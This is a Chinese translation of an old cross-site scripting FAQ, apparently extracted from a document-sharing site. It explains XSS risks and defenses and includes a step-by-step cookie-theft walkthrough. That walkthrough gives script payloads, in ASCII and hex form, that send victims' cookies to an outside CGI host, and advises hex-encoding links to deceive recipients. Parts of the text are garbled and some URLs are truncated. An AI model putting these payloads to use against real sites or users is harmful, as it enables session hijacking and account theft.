跨站腳本攻擊XSSFAQ_第1頁
跨站腳本攻擊XSSFAQ_第2頁
跨站腳本攻擊XSSFAQ_第3頁
跨站腳本攻擊XSSFAQ_第4頁
跨站腳本攻擊XSSFAQ_第5頁
免費(fèi)預(yù)覽已結(jié)束,剩余1頁可下載查看

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

1、跨站腳本攻擊(XSS)FAQ該文章簡單地介紹了XSS的基礎(chǔ)知識(shí)及其危害和預(yù)防方法。Web開發(fā)人員的必讀。譯自,什么是跨站腳本攻擊?,XSS和CSS是什么意思?,跨站腳本攻擊有什么危害?,能否給出幾個(gè)跨站腳本攻擊的例子?,能否解釋一下XSS cookie盜竊是什么意思?o第一步:鎖定目標(biāo)o第二步:測試o第三步:執(zhí)行XSSo第四步:處理收集到的信息,作為網(wǎng)站管理者應(yīng)當(dāng)如何防范?,作為用戶應(yīng)當(dāng)如何防范?,XSS漏洞有多常見?,加密能否防止XSS攻擊?,XSS漏洞能否在服務(wù)器上執(zhí)行命令?,如果我不修改CSS/XSS漏洞會(huì)怎樣?,介紹一些更深入講解 XSS的地方。簡介現(xiàn)在的網(wǎng)站包含大量的動(dòng)態(tài)內(nèi)容以提高用

2、戶體驗(yàn),比過去要復(fù)雜得多。所謂動(dòng)態(tài)內(nèi)容,就是根據(jù)用戶環(huán)境和需要,Web應(yīng)用程序能夠輸出相應(yīng)的內(nèi)容。動(dòng)態(tài)站點(diǎn)會(huì)受到一種名為跨站腳本攻擊”(Cross SiteScripting ,安全專家們通常將其所寫成 XSS )的威脅,而靜態(tài)站點(diǎn)則完全不受其影響。這篇 FAQ將使 你能更深入地理解這種威脅,并給出如何檢測并防止的建議??缯灸_本攻擊(也稱為XSS )指利用網(wǎng)站漏洞從用戶那里惡意盜取信息。用戶在瀏覽網(wǎng)站、使用即時(shí)通訊 軟件、甚至在閱讀電子郵件時(shí),通常會(huì)點(diǎn)擊其中的鏈接。攻擊者通過在鏈接中插入惡意代碼,就能夠盜取 用戶信息。攻擊者通常會(huì)用十六進(jìn)制(或其他編碼方式)將鏈接編碼,以免用戶懷疑它的合法性。

3、網(wǎng)站在 接收到包含惡意代碼的請(qǐng)求之后會(huì)產(chǎn)成一個(gè)包含惡意代碼的頁面,而這個(gè)頁面看起來就像是那個(gè)網(wǎng)站應(yīng)當(dāng)生成的合法頁面一樣。許多流行的留言本和論壇程序允許用戶發(fā)表包含HTML和javascript 的帖子。假設(shè)用戶甲發(fā)表了一篇包含惡意腳本的帖子,那么用戶乙在瀏覽這篇帖子時(shí),惡意腳本就會(huì)執(zhí)行,盜取用戶乙的session信息。有關(guān)攻擊方法的詳細(xì)情況將在下面闡述。XSS和CSS是什么意思?人們經(jīng)常將跨站腳本攻擊 (Cross Site Scripting) 縮寫為CSS,但這會(huì)與層疊樣式表(Cascading Style我發(fā)現(xiàn)了一個(gè)XSSSheets, CSS)的縮寫混淆。因此有人將跨站腳本攻擊縮寫為X

4、SS。如果你聽到有人說漏洞”,顯然他是在說跨站腳本攻擊??缯灸_本攻擊有什么危害?為了搜集用戶信息,攻擊者通常會(huì)在有漏洞的程序中插入JavaScript 、VBScript、ActiveX或Flash以欺騙用戶(詳見下文)。一旦得手,他們可以盜取用戶帳戶,修改用戶設(shè)置,盜取 /污染cookie ,做虛假 廣告等。每天都有大量的XSS攻擊的惡意代碼出現(xiàn)。Brett Moore的下面這篇文章詳細(xì)地闡述了拒絕服務(wù)攻擊”以及用戶僅僅閱讀一篇文章就會(huì)受到的自動(dòng)攻擊能否給出幾個(gè)跨站腳本攻擊的例子?著名的PHPnuke程序有很多XSS漏洞。由于該程序十分流行,因此經(jīng)常被黑客們作為XSS的攻擊對(duì)象進(jìn)行檢查。下面

5、給出了幾個(gè)已公開報(bào)告的攻擊方法。. cross site scripting.txt.能否解釋一下XSS cookie盜竊是什么意思?根據(jù)作為攻擊對(duì)象的 Web程序,下面某些變量和插入位置可能需要進(jìn)行調(diào)整。要注意這只是攻擊方法的 一個(gè)例子。在這個(gè)例子中,我們將利用腳本“a.php”中的“viriable變量中的跨站腳本漏洞,通過正常請(qǐng)求進(jìn)行攻擊。這是跨站腳本攻擊最常見的形式。第一步:鎖定目標(biāo)當(dāng)你找到某個(gè) Web程序存在XSS漏洞之后,檢查一下它是否設(shè)置了cookie 。如果在該網(wǎng)站的任何地方設(shè)置了 cookie ,那么就可以從用戶那里盜取它。第二步:測試某些惡不同的攻擊方式將產(chǎn)生不同的 XSS

6、漏洞,所以應(yīng)適當(dāng)進(jìn)行測試以使得輸出結(jié)果看起來像是正常的 意腳本插入之后會(huì)破壞輸出的頁面。(為欺騙用戶,輸出結(jié)果非常重要,因此攻擊者有必要調(diào)整攻擊代碼 使輸出看起來正常。)下一步你需要在鏈接至包含XSS漏洞的頁面的URL中插入Javascript (或其他客戶端腳本)。下面列出了一些經(jīng)常用于測試 XSS漏洞的鏈接。當(dāng)用戶點(diǎn)擊這些鏈接時(shí),用戶的 cookie獎(jiǎng)被發(fā)送到并被顯示。如果你看至U顯示結(jié)果中包含了cookie 信息,說明可能可以劫持該用戶的賬戶。盜取Cookie的Javascript 示例。使用方法如下。ASCII 用法http:/host/a.php?variable=">

7、;<script>document.location='http:/www.cg '%20+document.cookie</script>十六進(jìn)制用法http:/host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79 %2e%63%6f%6d%2f%63%67%69

8、%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e注意:每種用法都先寫為 ASCII ,再寫成十六進(jìn)制以便復(fù)制粘貼。1."><script>document.location='e.cgi?' +document.cookie</script>HEX %22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75

9、%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27 %68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69 %2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f %6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e2.<script>document.location

10、='cgi?' +document.cookie</script>HEX %3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e %2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%

11、6e%74%2e%63%6f%6f%6b %69%65%3c %2f%73%63%72%69%70%74%3e3. ><script>document.location='kie.cgi?' +document.cookie</script>HEX %3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c %6f%63%61%74%69%6f%6e%3d%27%68%74 %74%70%3a%2f%2f%77%77%77%2e%63%67%6 9%73%65%63%75%72%69%74%7

12、9%2e%63%6f%6d%2f%63%67%69%2d%62%69 %6e%2f%63%6f%6f %6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f %6b%69%65 %3c%2f%73%63%72%69%70%74%3e第三步:執(zhí)行XSS將做好的URL通過電子郵件或其他方式發(fā)送出去。注意如果你直接將URL發(fā)送給其他人(通過電子郵件、 即時(shí)通訊軟件或其他方式),你應(yīng)當(dāng)將其進(jìn)行十六進(jìn)制編碼,因?yàn)檫@些URL 一眼便可看出包含惡意代碼,但經(jīng)過十六進(jìn)制編碼之后就可以欺騙大部分人。第四步:處理收集到的信息一旦用

13、戶點(diǎn)擊了你的 URL,相應(yīng)數(shù)據(jù)就會(huì)被發(fā)送到你的 CGI腳本中。這樣你就獲得了 cookie信息,然后 你可以利用Websleuth 之類的工具來檢查是否能盜取那個(gè)賬戶。在上面的例子中,我們僅僅將用戶帶到了cookie.cgi頁面上。如果你有時(shí)間,你可以在 CGI中將用戶重定向到原來的頁面上,即可在用戶不知不覺之中盜取信息。某些電子郵件程序在打開附件時(shí)會(huì)自動(dòng)執(zhí)行附件中的Javascript 代碼。即使像Hotmail這樣的大型網(wǎng)站也是如此,不過它對(duì)附件內(nèi)容作了許多過濾以避免cookie被盜。作為網(wǎng)站管理者應(yīng)當(dāng)如何防范?這個(gè)問題很簡單。堅(jiān)決不要相信任何用戶輸入并過濾所有特殊字符。這樣既可消滅絕大部

14、分的 XSS攻擊。另一個(gè)建議是輸出頁面時(shí)將 < 和 > 變換成 < 和 >。要記住,XSS漏洞極具破壞性,一旦被利用,它會(huì)給你的事業(yè)帶來極大的損害。攻擊者會(huì)將這些漏洞公之于眾,這會(huì)在用戶隱私的問題上大大降低你的網(wǎng)站的用戶信賴度。當(dāng)然,僅僅將(和)變換成 < 和 > 是不夠的,最好將(和)變換成(和),#和&變換成#和&。作為用戶應(yīng)當(dāng)如何防范?保護(hù)自己的最好方法就是僅點(diǎn)擊你想訪問的那個(gè)網(wǎng)站上的鏈接。例如,如果你訪問了一個(gè)網(wǎng)站,該網(wǎng)站有一個(gè)鏈接指向了 CNN,那么不要單擊該鏈接,而是訪問 CNN的主站點(diǎn)并使用搜索引擎查找相關(guān)內(nèi)容。這樣可以杜絕90

15、%以上的XSS攻擊。有時(shí)候XSS會(huì)在你打開電子郵件、打開附件、閱讀留言板、閱讀論壇時(shí)自動(dòng)進(jìn)行。當(dāng)你打開電子郵件或是在公共論壇上閱讀你不認(rèn)識(shí)的人的帖子時(shí)一定要注意。最好的解決辦法就是關(guān)閉瀏覽器的 Javascript 功能。在IE中可以將安全級(jí)別設(shè)置為最高, 可以防止cookie被盜。XSS漏洞有多常見?由于XSS漏洞很容易在大型網(wǎng)站中發(fā)現(xiàn),在黑客圈內(nèi)它非常流行。FBI.gov、CNN.com、T 、Ebay、Yahoo、Apple、Microsoft、Zdnet、Wired、Newsbytes 都有這樣那樣的 XSS 漏洞。在商業(yè)產(chǎn)品中,平均每個(gè)月能夠發(fā)現(xiàn)10-25個(gè)XSS漏洞。加密能否防止X

16、SS攻擊?使用SSL(https)加密的網(wǎng)站并不比不加密的網(wǎng)站好到哪兒去。Web程序仍然以同樣的方式工作,只是攻擊是通過加密的連接實(shí)現(xiàn)。有些人看到瀏覽器上的鎖圖標(biāo)就認(rèn)為他們是安全的,其實(shí)不然。XSS漏洞能否在服務(wù)器上執(zhí)行命令?XSS漏洞會(huì)導(dǎo)致Javascript的惡意插入,但它的執(zhí)行受到很多限制。如果攻擊者利用瀏覽器的漏洞,有 可能在用戶的計(jì)算機(jī)上執(zhí)行命令。因此,就算能夠執(zhí)行命令也只能在客戶端。簡單地說,XSS漏洞可以觸發(fā)客戶端的其他漏洞。如果我不修改CSS/XSS漏洞會(huì)怎樣?如果不修改XSS漏洞,你的網(wǎng)站上的用戶會(huì)受到被篡改的威脅。許多大型網(wǎng)站都發(fā)現(xiàn)了XSS漏洞,這個(gè)問題已經(jīng)得到普遍認(rèn)識(shí)。如

17、果不修改,發(fā)現(xiàn)它的人也許會(huì)警告你的公司,損害公司的信譽(yù)。你拒絕修改漏 洞的消息也會(huì)傳到客戶那里,造成公司的信任危機(jī)??蛻舨恍湃蔚脑掃€怎么做生意?介紹一些更深入講解XSS的地方。"Cross-site scripting tears holes in Net security"Article on XSS holes"CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests" /advisories/CA-2000-02.htmlPaper on Removing Meta-characters from User Supplied Data in CGI Scripts./tech tips/cgi metacharacters.htmlPaper on Microsoft's Passport System papers/passporthijack.htmlPaper on Cooki

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

評(píng)論

0/150

提交評(píng)論